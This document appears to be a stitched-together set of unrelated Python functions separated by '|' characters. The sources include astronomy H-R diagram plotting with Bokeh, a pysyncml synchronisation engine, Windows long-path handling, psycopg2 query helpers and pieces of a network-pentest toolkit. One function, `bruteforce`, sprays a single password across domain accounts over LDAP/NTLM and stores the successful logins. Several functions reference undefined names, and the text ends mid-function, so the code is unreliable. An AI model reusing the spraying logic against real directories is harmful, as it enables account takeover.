def hr_diagram_figure(cluster):
"""
Given a cluster, create a Bokeh plot figure containing an
H-R diagram.
"""
temps, lums = round_teff_luminosity(cluster)
x, y = temps, lums
colors, color_mapper = hr_diagram_color_helper(temps)
x_range = [max(x) + max(x) * 0.05, min(x) - min(x) * 0.05]
source = ColumnDataSource(data=dict(x=x, y=y, color=colors))
pf = figure(y_axis_type='log', x_range=x_range, name='hr',
tools='box_select,lasso_select,reset,hover',
title='H-R Diagram for {0}'.format(cluster.name))
pf.select(BoxSelectTool).select_every_mousemove = False
pf.select(LassoSelectTool).select_every_mousemove = False
hover = pf.select(HoverTool)[0]
hover.tooltips = [("Temperature (Kelvin)", "@x{0}"),
("Luminosity (solar units)", "@y{0.00}")]
_diagram(source=source, plot_figure=pf, name='hr',
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
return pf |
def calculate_diagram_ranges(data):
"""
Given a numpy array, calculate what the ranges of the H-R
diagram should be.
"""
data = round_arr_teff_luminosity(data)
temps = data['temp']
x_range = [1.05 * np.amax(temps), .95 * np.amin(temps)]
lums = data['lum']
y_range = [.50 * np.amin(lums), 2 * np.amax(lums)]
return (x_range, y_range) |
def hr_diagram_from_data(data, x_range, y_range):
"""
Given a numpy array, create a Bokeh plot figure containing an
H-R diagram.
"""
_, color_mapper = hr_diagram_color_helper([])
data_dict = {
'x': list(data['temperature']),
'y': list(data['luminosity']),
'color': list(data['color'])
}
source = ColumnDataSource(data=data_dict)
pf = figure(y_axis_type='log', x_range=x_range, y_range=y_range)
_diagram(source=source, plot_figure=pf,
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
show_with_bokeh_server(pf) |
def cluster_text_input(cluster, title=None):
"""
Create an :class:`~bokeh.models.widgets.TextInput` using
the cluster.name as the default value and title.
If no title is provided, use 'Type in the name of your cluster
and press Enter/Return:'.
"""
if not title:
title = 'Type in the name of your cluster and press Enter/Return:'
return TextInput(value=cluster.name, title=title) |
def hr_diagram_selection(cluster_name):
"""
Given a cluster, create two Bokeh plot based H-R diagrams.
The selection in the left H-R diagram will show up in the
right one.
"""
cluster = get_hr_data(cluster_name)
temps, lums = round_teff_luminosity(cluster)
x, y = temps, lums
colors, color_mapper = hr_diagram_color_helper(temps)
x_range = [max(x) + max(x) * 0.05, min(x) - min(x) * 0.05]
source = ColumnDataSource(data=dict(x=x, y=y, color=colors), name='hr')
source_selected = ColumnDataSource(data=dict(x=[], y=[], color=[]),
name='hr')
pf = figure(y_axis_type='log', x_range=x_range,
tools='lasso_select,reset',
title='H-R Diagram for {0}'.format(cluster.name))
_diagram(source=source, plot_figure=pf, name='hr', color={'field':
'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
pf_selected = figure(y_axis_type='log', y_range=pf.y_range,
x_range=x_range,
tools='reset',
title='H-R Diagram for {0}'.format(cluster.name))
_diagram(source=source_selected, plot_figure=pf_selected, name='hr',
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
source.callback = CustomJS(args=dict(source_selected=source_selected),
code="""
var inds = cb_obj.selected['1d'].indices;
var d1 = cb_obj.data;
var d2 = source_selected.data;
console.log(inds);
d2['x'] = []
d2['y'] = []
d2['color'] = []
for (i = 0; i < inds.length; i++) {
d2['x'].push(d1['x'][inds[i]])
d2['y'].push(d1['y'][inds[i]])
d2['color'].push(d1['color'][inds[i]])
}
source_selected.change.emit();
""")
show_with_bokeh_server(row(pf, pf_selected)) |
def _filter_cluster_data(self):
"""
Filter the cluster data catalog into the filtered_data
catalog, which is what is shown in the H-R diagram.
Filter on the values of the sliders, as well as the lasso
selection in the skyviewer.
"""
min_temp = self.temperature_range_slider.value[0]
max_temp = self.temperature_range_slider.value[1]
temp_mask = np.logical_and(
self.cluster.catalog['temperature'] >= min_temp,
self.cluster.catalog['temperature'] <= max_temp
)
min_lum = self.luminosity_range_slider.value[0]
max_lum = self.luminosity_range_slider.value[1]
lum_mask = np.logical_and(
self.cluster.catalog['luminosity'] >= min_lum,
self.cluster.catalog['luminosity'] <= max_lum
)
selected_mask = np.isin(self.cluster.catalog['id'], self.selection_ids)
filter_mask = temp_mask & lum_mask & selected_mask
self.filtered_data = self.cluster.catalog[filter_mask].data
self.source.data = {
'id': list(self.filtered_data['id']),
'temperature': list(self.filtered_data['temperature']),
'luminosity': list(self.filtered_data['luminosity']),
'color': list(self.filtered_data['color'])
}
logging.debug("Selected data is now: %s", self.filtered_data) |
def modify_data(data):
"""
Write the data to a tempfile, open it in an editor (nano) and return the edited data afterwards.
"""
with tempfile.NamedTemporaryFile('w') as f:
for entry in data:
f.write(json.dumps(entry.to_dict(
include_meta=True),
default=datetime_handler))
f.write('\n')
f.flush()
print_success("Starting editor")
subprocess.call(['nano', '-', f.name])
with open(f.name, 'r') as f:
return f.readlines() |
def modify_input():
"""
This function gives the user a way to change the data that is given as input.
"""
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
objects = [obj for obj in doc_mapper.get_pipe()]
modified = modify_data(objects)
for line in modified:
obj = doc_mapper.line_to_object(line)
obj.save()
print_success("Object(s) successfully changed")
else:
print_error("Please use this tool with pipes") |
def bruteforce(users, domain, password, host):
"""
Performs a bruteforce for the given users, password, domain on the given host.
"""
cs = CredentialSearch(use_pipe=False)
print_notification("Connecting to {}".format(host))
s = Server(host)
c = Connection(s)
for user in users:
if c.rebind(user="{}\\{}".format(domain, user.username), password=password, authentication=NTLM):
print_success('Success for: {}:{}'.format(user.username, password))
credential = cs.find_object(
user.username, password, domain=domain, host_ip=host)
if not credential:
credential = Credential(username=user.username, secret=password,
domain=domain, host_ip=host, type="plaintext", port=389)
credential.add_tag(tag)
credential.save()
# Add a tag to the user object, so we don't have to bruteforce it again.
user.add_tag(tag)
user.save()
else:
print_error("Fail for: {}:{}".format(user.username, password)) |
def Adapter(self, **kw):
'''
.. TODO:: move this documentation into model/adapter.py?...
The Adapter constructor supports the following parameters:
:param devID:
sets the local adapter\'s device identifier. For servers, this
should be the externally accessible URL that launches the SyncML
transaction, and for clients this should be a unique ID, such as
the IMEI number (for mobile phones). If not specified, it will
be defaulted to the `devID` of the `devinfo` object. If it
cannot be loaded from the database or from the `devinfo`, then
it must be provided before any synchronization can begin.
:param name:
sets the local adapter\'s device name - usually a human-friendly
description of this SyncML\'s function.
:param devinfo:
sets the local adapter :class:`pysyncml.devinfo.DeviceInfo`. If
not specified, it will be auto-loaded from the database. If it
cannot be loaded from the database, then it must be provided
before any synchronization can begin.
:param peer:
TODO: document...
:param maxGuidSize:
TODO: document...
:param maxMsgSize:
TODO: document...
:param maxObjSize:
TODO: document...
:param conflictPolicy:
sets the default conflict handling policy for this adapter,
and can be overridden on a per-store basis (applies only when
operating as the server role).
'''
try:
ret = self._model.Adapter.q(isLocal=True).one()
for k, v in kw.items():
setattr(ret, k, v)
except NoResultFound:
ret = self._model.Adapter(**kw)
ret.isLocal = True
self._model.session.add(ret)
if ret.devID is not None:
self._model.session.flush()
ret.context = self
# todo: is this really the best place to do this?...
ret.router = self.router or router.Router(ret)
ret.protocol = self.protocol or protocol.Protocol(ret)
ret.synchronizer = self.synchronizer or synchronizer.Synchronizer(ret)
ret.codec = self.codec or 'xml'
if isinstance(ret.codec, basestring):
ret.codec = codec.Codec.factory(ret.codec)
if ret.devID is not None:
peers = ret.getKnownPeers()
if len(peers) == 1 and peers[0].url is not None:
ret._peer = peers[0]
return ret |
def RemoteAdapter(self, **kw):
'''
.. TODO:: move this documentation into model/adapter.py?...
The RemoteAdapter constructor supports the following parameters:
:param url:
specifies the URL that this remote SyncML server can be reached
at. The URL must be a fully-qualified URL.
:param auth:
set what kind of authentication scheme to use, which generally is
one of the following values:
**None**:
indicates no authentication is required.
**pysyncml.NAMESPACE_AUTH_BASIC**:
specifies to use "Basic-Auth" authentication scheme.
**pysyncml.NAMESPACE_AUTH_MD5**:
specifies to use MD5 "Digest-Auth" authentication scheme.
NOTE: this may not be implemented yet...
:param username:
if the `auth` is not ``None``, then the username to authenticate
as must be provided via this parameter.
:param password:
if the `auth` is not ``None``, then the password to authenticate
with must be provided via this parameter.
'''
# TODO: is this really the right way?...
ret = self._model.Adapter(isLocal=False, **kw)
self._model.session.add(ret)
if ret.devID is not None:
self._model.session.flush()
return ret |
def pprint_path(path):
"""
Print information about a pathlib / os.DirEntry() instance using all of its "is_*" methods.
"""
print("\n*** %s" % path)
for attrname in sorted(dir(path)):
if attrname.startswith("is_"):
value = getattr(path, attrname)
print("%20s: %s" % (attrname, value))
print() |
def utime(self, *args, **kwargs):
""" Set the access and modified times of the file specified by path. """
os.utime(self.extended_path, *args, **kwargs) |
def _from_parts(cls, args, init=True):
"""
Strip \\?\ prefix in init phase
"""
if args:
args = list(args)
if isinstance(args[0], WindowsPath2):
args[0] = args[0].path
elif args[0].startswith("\\\\?\\"):
args[0] = args[0][4:]
args = tuple(args)
return super(WindowsPath2, cls)._from_parts(args, init) |
def extended_path(self):
"""
Add the \\?\ prefix to every absolute path, turning it into an "extended-length"
path that may be longer than 259 characters (the "MAX_PATH" limit)
see:
https://msdn.microsoft.com/en-us/library/aa365247.aspx#maxpath
"""
if self.is_absolute() and not self.path.startswith("\\\\"):
return "\\\\?\\%s" % self.path
return self.path |
def path(self):
"""
Return the path always without the \\?\ prefix.
"""
path = super(WindowsPath2, self).path
if path.startswith("\\\\?\\"):
return path[4:]
return path |
def relative_to(self, other):
"""
The important point here is that both paths are consistent:
either both have the \\?\ prefix or neither does.
"""
return super(WindowsPath2, Path2(self.path)).relative_to(Path2(other).path) |
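# Usage sketch (hypothetical paths, assuming Path2 resolves to WindowsPath2 on
# Windows): the \\?\ prefix is added for extended-length access and stripped
# again when reading .path back, so relative_to() sees consistent inputs.
p = Path2(r"C:\very\long\directory\tree\file.txt")
print(p.extended_path)              # \\?\C:\very\long\directory\tree\file.txt
print(p.path)                       # C:\very\long\directory\tree\file.txt
print(p.relative_to(r"C:\very"))    # long\directory\tree\file.txt |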
def format():
"""
Formats the output of another tool in the given way.
Has default styles for ranges, hosts and services.
"""
argparser = argparse.ArgumentParser(description='Formats a json object in a certain way. Use with pipes.')
argparser.add_argument('format', metavar='format', help='How to format the json for example "{address}:{port}".', nargs='?')
arguments = argparser.parse_args()
service_style = "{address:15} {port:7} {protocol:5} {service:15} {state:10} {banner} {tags}"
host_style = "{address:15} {tags}"
ranges_style = "{range:18} {tags}"
users_style = "{username}"
if arguments.format:
format_input(arguments.format)
else:
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
for obj in doc_mapper.get_pipe():
style = ''
if isinstance(obj, Range):
style = ranges_style
elif isinstance(obj, Host):
style = host_style
elif isinstance(obj, Service):
style = service_style
elif isinstance(obj, User):
style = users_style
print_line(fmt.format(style, **obj.to_dict(include_meta=True)))
else:
print_error("Please use this script with pipes") |
def print_line(text):
"""
Print the given line to stdout
"""
try:
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
except ValueError:
pass
try:
sys.stdout.write(text)
if not text.endswith('\n'):
sys.stdout.write('\n')
sys.stdout.flush()
except IOError:
sys.exit(0) |
def draw_interface(objects, callback, callback_text):
"""
Draws an ncurses interface. Every object in the given object list should have a "string" key; this is what is displayed on the screen. The callback is called with the selected object.
Rest of the code is modified from:
https://stackoverflow.com/a/30834868
"""
screen = curses.initscr()
height, width = screen.getmaxyx()
curses.noecho()
curses.cbreak()
curses.start_color()
screen.keypad( 1 )
curses.init_pair(1,curses.COLOR_BLACK, curses.COLOR_CYAN)
highlightText = curses.color_pair( 1 )
normalText = curses.A_NORMAL
screen.border( 0 )
curses.curs_set( 0 )
max_row = height - 15 # max number of rows
box = curses.newwin( max_row + 2, int(width - 2), 1, 1 )
box.box()
fmt = PartialFormatter()
row_num = len( objects )
pages = int( ceil( row_num / max_row ) )
position = 1
page = 1
for i in range( 1, max_row + 1 ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
if (i == position):
box.addstr( i, 2, str( i ) + " - " + objects[ i - 1 ]['string'], highlightText )
else:
box.addstr( i, 2, str( i ) + " - " + objects[ i - 1 ]['string'], normalText )
if i == row_num:
break
screen.refresh()
box.refresh()
x = screen.getch()
while x != 27:
if x == curses.KEY_DOWN:
if page == 1:
if position < i:
position = position + 1
else:
if pages > 1:
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
elif page == pages:
if position < row_num:
position = position + 1
else:
if position < max_row + ( max_row * ( page - 1 ) ):
position = position + 1
else:
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
if x == curses.KEY_UP:
if page == 1:
if position > 1:
position = position - 1
else:
if position > ( 1 + ( max_row * ( page - 1 ) ) ):
position = position - 1
else:
page = page - 1
position = max_row + ( max_row * ( page - 1 ) )
screen.erase()
if x == ord( "\n" ) and row_num != 0:
screen.erase()
screen.border( 0 )
service = objects[position -1]
text = fmt.format(callback_text, **service)
screen.addstr( max_row + 4, 3, text)
text = callback(service)
count = 0
for line in text:
screen.addstr( max_row + 5 + count, 3, line)
count += 1
box.erase()
screen.border( 0 )
box.border( 0 )
for i in range( 1 + ( max_row * ( page - 1 ) ), max_row + 1 + ( max_row * ( page - 1 ) ) ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
if ( i + ( max_row * ( page - 1 ) ) == position + ( max_row * ( page - 1 ) ) ):
box.addstr( i - ( max_row * ( page - 1 ) ), 2, str( i ) + " - " + objects[ i - 1 ]['string'], highlightText )
else:
box.addstr( i - ( max_row * ( page - 1 ) ), 2, str( i ) + " - " + objects[ i - 1 ]['string'], normalText )
if i == row_num:
break
screen.refresh()
box.refresh()
x = screen.getch()
curses.endwin()
exit() |
def get_own_ip():
"""
Gets the IP from the inet interfaces.
"""
own_ip = None
interfaces = psutil.net_if_addrs()
for _, details in interfaces.items():
for detail in details:
if detail.family == socket.AF_INET:
ip_address = ipaddress.ip_address(detail.address)
if not (ip_address.is_link_local or ip_address.is_loopback):
own_ip = str(ip_address)
break
return own_ip |
def pprint(arr, columns=('temperature', 'luminosity'),
names=('Temperature (Kelvin)', 'Luminosity (solar units)'),
max_rows=32, precision=2):
"""
Create a pandas DataFrame from a numpy ndarray.
By default use temp and lum with max rows of 32 and precision of 2.
arr - A numpy.ndarray.
columns - The columns to include in the pandas DataFrame. Defaults to
temperature and luminosity.
names - The column names for the pandas DataFrame. Defaults to
Temperature and Luminosity.
max_rows - If max_rows is an integer then set the pandas
display.max_rows option to that value. If max_rows
is True then set display.max_rows option to 1000.
precision - An integer to set the pandas precision option.
"""
if max_rows is True:
pd.set_option('display.max_rows', 1000)
elif type(max_rows) is int:
pd.set_option('display.max_rows', max_rows)
pd.set_option('precision', precision)
df = pd.DataFrame(arr.flatten(), index=arr['id'].flatten(),
columns=columns)
df.columns = names
return df.style.format({names[0]: '{:.0f}',
names[1]: '{:.2f}'}) |
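# Usage sketch (hypothetical data): build a small structured array with the
# fields pprint() expects ('id', 'temperature', 'luminosity') and render it
# as a styled pandas DataFrame.
import numpy as np
stars = np.array([(1, 5778.0, 1.0), (2, 9940.0, 25.4)],
                 dtype=[('id', 'i4'), ('temperature', 'f8'), ('luminosity', 'f8')])
styled = pprint(stars, max_rows=10, precision=2)  # display `styled` in a notebook |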
def strip_labels(filename):
"""Strips labels."""
labels = []
with open(filename) as f, open('processed_labels.txt', 'w') as f1:
for l in f:
if l.startswith('#'):
continue
l = l.replace(" .", '')
l = l.replace(">\tskos:prefLabel\t", ' ')
l = l.replace("<", '')
l = l.replace(">\trdfs:label\t", ' ')
f1.write(l) |
def remove_namespace(doc, namespace):
'''Remove namespace in the passed document in place.'''
ns = u'{%s}' % namespace
nsl = len(ns)
for elem in doc.getiterator():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
elem.attrib['oxmlns'] = namespace |
def resolve(self, uri):
""" Resolve a Resource identified by URI
:param uri: The URI of the resource to be resolved
:type uri: str
:return: the retriever able to resolve the given URI
:rtype: Retriever
"""
for r in self.__retrievers__:
if r.match(uri):
return r
raise UnresolvableURIError() |
def read(self, uri):
""" Retrieve the contents of the resource
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: the contents of the resource
:rtype: str
"""
req = request("GET", uri)
return req.content, req.headers['Content-Type'] |
def match(self, uri):
""" Check to see if this URI is retrievable by this Retriever implementation
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: True if it can be, False if not
:rtype: bool
"""
absolute_uri = self.__absolute__(uri)
return absolute_uri.startswith(self.__path__) and op.exists(absolute_uri) |
def read(self, uri):
""" Retrieve the contents of the resource
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: the contents of the resource
:rtype: str
"""
uri = self.__absolute__(uri)
mime, _ = guess_type(uri)
if "image" in mime:
return send_file(uri), mime
else:
with open(uri, "r") as f:
file = f.read()
return file, mime |
def read(self, uri):
""" Retrieve the contents of the resource
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: the contents of the resource
:rtype: str
"""
return self.__resolver__.getTextualNode(uri).export(Mimetypes.XML.TEI), "text/xml" |
def hook(name):
'''
Decorator used to tag a method that should be used as a hook for the
specified `name` hook type.
'''
def hookTarget(wrapped):
if not hasattr(wrapped, '__hook__'):
wrapped.__hook__ = [name]
else:
wrapped.__hook__.append(name)
return wrapped
return hookTarget |
def addHook(self, name, callable):
'''
Subscribes `callable` to listen to events of `name` type. The
parameters passed to `callable` are dependent on the specific
event being triggered.
'''
if name not in self._hooks:
self._hooks[name] = []
self._hooks[name].append(callable) |
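# Usage sketch (hypothetical agent class): @hook stores the event name in the
# method's __hook__ list; the engine can then discover such methods and
# subscribe them with addHook(), so they fire when the matching event
# (e.g. 'adapter.create.init') is triggered.
class MyAgent(object):
    @hook('adapter.create.init')
    def on_adapter_init(self, *args, **kwargs):
        print('adapter is being created')
assert MyAgent.on_adapter_init.__hook__ == ['adapter.create.init'] |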
def _makeAdapter(self):
'''
Creates a tuple of ( Context, Adapter ) based on the options
specified by `self.options`. The Context is the pysyncml.Context created for
the storage location specified in `self.options`, and the Adapter is a newly
created Adapter if a previously created one was not found.
'''
self._callHooks('adapter.create.init')
# create a new pysyncml.Context. the main function that this provides is
# to give the Adapter a storage engine to store state information across
# synchronizations.
context = pysyncml.Context(storage='sqlite:///%ssyncml.db' % (self.dataDir,),
owner=None, autoCommit=True)
self._callHooks('adapter.create.context', context)
# create an Adapter from the current context. this will either create
# a new adapter, or load the current local adapter for the specified
# context storage location. if it is new, then lots of required
# information (such as device info) will not be set, so we need to
# check that and specify it if missing.
adapter = context.Adapter()
if hasattr(self, 'serverConf') and self.serverConf.policy is not None:
adapter.conflictPolicy = self.serverConf.policy
if self.options.name is not None or self.appDisplay is not None:
adapter.name = self.options.name or self.appDisplay
# TODO: stop ignoring ``self.options.remoteUri``... (the router must first support
# manual routes...)
# if self.options.remoteUri is not None:
# adapter.router.addRoute(self.agent.uri, self.options.remoteUri)
if adapter.devinfo is None:
log.info('adapter has no device info - registering new device')
else:
if self.options.devid is not None and self.options.devid != adapter.devinfo.devID:
log.info('adapter has different device ID - overwriting with new device info')
adapter.devinfo = None
if adapter.devinfo is None:
# setup some information about the local device, most importantly the
# device ID, which the remote peer will use to uniquely identify this peer
devinfoParams = dict(
devID = self.options.devid or self.defaultDevID,
devType = pysyncml.DEVTYPE_SERVER if self.options.server else \
pysyncml.DEVTYPE_WORKSTATION,
manufacturerName = 'pysyncml',
modelName = self.appLabel,
softwareVersion = pysyncml.version,
hierarchicalSync = self.agent.hierarchicalSync if self.agent is not None else False,
)
if self.devinfoParams is not None:
devinfoParams.update(self.devinfoParams)
adapter.devinfo = context.DeviceInfo(**devinfoParams)
self._callHooks('adapter.create.adapter', context, adapter)
if not self.options.server:
# servers don't have a fixed peer; i.e. the SyncML message itself
# defines which peer is connecting.
if adapter.peer is None:
if self.options.remote is None:
self.options.remote = raw_input('SyncML remote URL: ')
if self.options.username is None:
self.options.username = raw_input('SyncML remote username (leave empty if none): ')
if len(self.options.username) <= 0:
self.options.username = None
log.info('adapter has no remote info - registering new remote adapter')
else:
if self.options.remote is not None:
if self.options.remote != adapter.peer.url \
or self.options.username != adapter.peer.username \
or self.options.password != adapter.peer.password:
#or self.options.password is not None:
log.info('adapter has invalid or rejected remote info - overwriting with new remote info')
adapter.peer = None
if adapter.peer is None:
auth = None
if self.options.username is not None:
auth = pysyncml.NAMESPACE_AUTH_BASIC
if self.options.password is None:
self.options.password = getpass.getpass('SyncML remote password: ')
# setup the remote connection parameters, if not already stored in
# the adapter sync tables or the URL has changed.
adapter.peer = context.RemoteAdapter(
url = self.options.remote,
auth = auth,
username = self.options.username,
password = self.options.password,
)
self._callHooks('adapter.create.peer', context, adapter, adapter.peer)
# add a datastore attached to the URI "note". the actual value of
# the URI is irrelevant - it is only an identifier for this item
# synchronization channel. it must be unique within this adapter
# and must stay consistent across synchronizations.
# TODO: this check should be made redundant... (ie. once the
# implementation of Store.merge() is fixed this will
# become a single "addStore()" call without the check first).
uri = self.storeParams.get('uri', self.appLabel)
if uri in adapter.stores:
store = adapter.stores[uri]
store.agent = self.agent
else:
storeParams = dict(
uri = uri,
displayName = self.options.name or self.appDisplay,
agent = self.agent,
# TODO: adding this for funambol-compatibility...
maxObjSize = None)
if self.storeParams is not None:
storeParams.update(self.storeParams)
store = adapter.addStore(context.Store(**storeParams))
self._callHooks('adapter.create.store', context, adapter, store)
if self.options.local:
def locprint(msg):
print msg
else:
locprint = log.info
def showChanges(changes, prefix):
for c in changes:
if c.state != pysyncml.ITEM_DELETED:
item = self.agent.getItem(c.itemID)
else:
item = 'Item ID %s' % (c.itemID,)
locprint('%s - %s: %s' % (prefix, item, pysyncml.state2string(c.state)))
if self.options.server:
peers = adapter.getKnownPeers()
if len(peers) > 0:
locprint('Pending changes to propagate:')
else:
locprint('No pending changes to propagate (no peers yet)')
for peer in peers:
for puri, pstore in peer.stores.items():
if pstore.binding is None or pstore.binding.uri != store.uri:
continue
changes = list(pstore.getRegisteredChanges())
if len(changes) <= 0:
locprint(' Registered to peer "%s" URI "%s": (none)' % (peer.devID, puri))
else:
locprint(' Registered to peer "%s" URI "%s":' % (peer.devID, puri))
showChanges(changes, ' ')
else:
if store.peer is None:
locprint('No pending local changes (not associated yet).')
else:
changes = list(store.peer.getRegisteredChanges())
if len(changes) <= 0:
locprint('No pending local changes to synchronize.')
else:
locprint('Pending local changes:')
showChanges(changes, '')
self._callHooks('adapter.create.term', context, adapter)
return (context, adapter) |
def configure(self, argv=None):
'''
Configures this engine based on the options array passed into
`argv`. If `argv` is ``None``, then ``sys.argv`` is used instead.
During configuration, the command line options are merged with
previously stored values. Then the logging subsystem and the
database model are initialized, and all storable settings are
serialized to configurations files.
'''
self._setupOptions()
self._parseOptions(argv)
self._setupLogging()
self._setupModel()
self.dbsession.commit()
return self |
def run(self, stdout=sys.stdout, stderr=sys.stderr):
'''
Runs this SyncEngine by executing one of the following functions
(as controlled by command-line options or stored parameters):
* Display local pending changes.
* Describe local configuration.
* Run an HTTP server and engage server-side mode.
* Connect to a remote SyncML peer and engage client-side mode.
NOTE: when running in the first two modes, all database interactions
are rolled back in order to keep the SyncEngine idempotent.
'''
if self.options.local or self.options.describe:
context, adapter = self._makeAdapter()
if self.options.describe:
self.describe(stdout)
adapter.describe(stdout)
self.dbsession.rollback()
return 0
if self.options.server:
return self._runServer(stdout, stderr)
return self._runClient(stdout, stderr) |
def _assemble_with_columns(self, sql_str, columns, *args, **kwargs):
"""
Format a select statement with specific columns
:sql_str: An SQL string template
:columns: The columns to be selected and put into {0}
:*args: Arguments to use as query parameters.
:returns: Psycopg2 compiled query
"""
# Handle any aliased columns we get (e.g. table_alias.column)
qcols = []
for col in columns:
if '.' in col:
# Explode it
wlist = col.split('.')
# Reassemble into string and drop it into the list
qcols.append(sql.SQL('.').join([sql.Identifier(x) for x in wlist]))
else:
qcols.append(sql.Identifier(col))
# sql.SQL(', ').join([sql.Identifier(x) for x in columns]),
query_string = sql.SQL(sql_str).format(
sql.SQL(', ').join(qcols),
*[sql.Literal(a) for a in args]
)
return query_string |
def _assemble_select(self, sql_str, columns, *args, **kwargs):
""" Alias for _assemble_with_columns
"""
warnings.warn("_assemble_select has been deprecated in favor of _assemble_with_columns. It will be removed in a future version.", DeprecationWarning)
return self._assemble_with_columns(sql_str, columns, *args, **kwargs) |
def _assemble_simple(self, sql_str, *args, **kwargs):
"""
Format an SQL statement with literal query parameters only (no column identifiers)
:sql_str: An SQL string template
:*args: Arguments to use as query parameters.
:returns: Psycopg2 compiled query
"""
query_string = sql.SQL(sql_str).format(
*[sql.Literal(a) for a in args]
)
return query_string |
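# Usage sketch (hypothetical model instance `dao` and table): {0} receives the
# joined column Identifiers, later placeholders receive Literals built from args.
q = dao._assemble_with_columns(
    "SELECT {0} FROM users WHERE user_id = {1};", ['user_id', 'users.name'], 42)
q2 = dao._assemble_simple("DELETE FROM users WHERE user_id = {0};", 42) |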
def _execute(self, query, commit=False, working_columns=None):
"""
Execute a query with provided parameters
Parameters
:query: SQL string with parameter placeholders
:commit: If True, the query will commit
:returns: List of rows
"""
log.debug("RawlBase._execute()")
result = []
if working_columns is None:
working_columns = self.columns
with RawlConnection(self.dsn) as conn:
query_id = random.randrange(9999)
curs = conn.cursor()
try:
log.debug("Executing(%s): %s" % (query_id, query.as_string(curs)))
except:
log.exception("LOGGING EXCEPTION LOL")
curs.execute(query)
log.debug("Executed")
if commit == True:
log.debug("COMMIT(%s)" % query_id)
conn.commit()
log.debug("curs.rowcount: %s" % curs.rowcount)
if curs.rowcount > 0:
#result = curs.fetchall()
# Process the results into a dict and stuff it in a RawlResult
# object. Then append that object to result
result_rows = curs.fetchall()
for row in result_rows:
i = 0
row_dict = {}
for col in working_columns:
try:
#log.debug("row_dict[%s] = row[%s] which is %s" % (col, i, row[i]))
# For aliased columns, we need to get rid of the dot
col = col.replace('.', '_')
row_dict[col] = row[i]
except IndexError: pass
i += 1
log.debug("Appending dict to result: %s" % row_dict)
rr = RawlResult(working_columns, row_dict)
result.append(rr)
curs.close()
return result |
def process_columns(self, columns):
"""
Handle provided columns and, if necessary, convert columns to a list for
internal storage.
:columns: A sequence of columns for the table. Can be list, comma
-delimited string, or IntEnum.
"""
if type(columns) == list:
self.columns = columns
elif type(columns) == str:
self.columns = [c.strip() for c in columns.split(',')]
elif isinstance(columns, type) and issubclass(columns, IntEnum):
self.columns = [str(c) for c in columns]
else:
raise RawlException("Unknown format for columns") |
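# Usage sketch (hypothetical column sets): both accepted input formats below
# end up as a plain list of column names in self.columns.
dao.process_columns(['user_id', 'name', 'created_on'])
dao.process_columns("user_id, name, created_on") |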
def query(self, sql_string, *args, **kwargs):
"""
Execute a DML query
:sql_string: An SQL string template
:*args: Arguments to be passed for query parameters.
:commit: Whether or not to commit the transaction after the query
:returns: Psycopg2 result
"""
commit = None
columns = None
if kwargs.get('commit') is not None:
commit = kwargs.pop('commit')
if kwargs.get('columns') is not None:
columns = kwargs.pop('columns')
query = self._assemble_simple(sql_string, *args, **kwargs)
return self._execute(query, commit=commit, working_columns=columns) |
def select(self, sql_string, cols, *args, **kwargs):
"""
Execute a SELECT statement
:sql_string: An SQL string template
:columns: A list of columns to be returned by the query
:*args: Arguments to be passed for query parameters.
:returns: Psycopg2 result
"""
working_columns = None
if kwargs.get('columns') is not None:
working_columns = kwargs.pop('columns')
query = self._assemble_select(sql_string, cols, *args, **kwargs)
return self._execute(query, working_columns=working_columns) |
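# Usage sketch (hypothetical table): in select(), {0} is filled with the column
# list and {1} with the first literal parameter.
rows = dao.select("SELECT {0} FROM users WHERE email = {1};",
                  ['user_id', 'name', 'email'], 'someone@example.org') |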
def insert_dict(self, value_dict, commit=False):
"""
Execute an INSERT statement using a python dict
:value_dict: A dictionary representing all the columns(keys) and
values that should be part of the INSERT statement
:commit: Whether to automatically commit the transaction
:returns: Psycopg2 result
"""
# Sanity check the value_dict
for key in value_dict.keys():
if key not in self.columns:
raise ValueError("Column %s does not exist" % key)
# These lists will make up the columns and values of the INSERT
insert_cols = []
value_set = []
# Go through all the possible columns and look for that column in the
# dict. If available, we need to add it to our col/val sets
for col in self.columns:
if col in value_dict:
#log.debug("Inserting with column %s" % col)
insert_cols.append(col)
value_set.append(value_dict[col])
# Create SQL statement placeholders for the dynamic values
placeholders = ', '.join(["{%s}" % x for x in range(1, len(value_set) + 1)])
# TODO: Maybe don't trust table_name and pk_name? Shouldn't really be
# user input, but who knows.
query = self._assemble_with_columns('''
INSERT INTO "''' + self.table + '''" ({0})
VALUES (''' + placeholders + ''')
RETURNING ''' + self.pk + '''
''', insert_cols, *value_set)
result = self._execute(query, commit=commit)
# If the INSERT returned anything, try to hand back the primary key
if len(result) > 0:
# Return the pk if we can
if hasattr(result[0], self.pk):
return getattr(result[0], self.pk)
# Otherwise, the full result
else:
return result[0]
else:
return None |
def get(self, pk):
"""
Retrieve a single record from the table. Lots of reasons this might be
best implemented in the model
:pk: The primary key ID for the record
:returns: List of single result
"""
if type(pk) == str:
# Probably an int, give it a shot
try:
pk = int(pk)
except ValueError: pass
return self.select(
"SELECT {0} FROM " + self.table + " WHERE " + self.pk + " = {1};",
self.columns, pk) |
def dump(self, stream, contentType=None, version=None):
'''
Serializes this FileItem to a byte-stream and writes it to the
file-like object `stream`. `contentType` and `version` must be one
of the supported content-types, and if not specified, will default
to ``application/vnd.omads-file``.
'''
if contentType is None:
contentType = constants.TYPE_OMADS_FILE
if ctype.getBaseType(contentType) != constants.TYPE_OMADS_FILE:
raise common.InvalidContentType('cannot serialize FileItem to "%s"' % (contentType,))
if version is None:
version = '1.2'
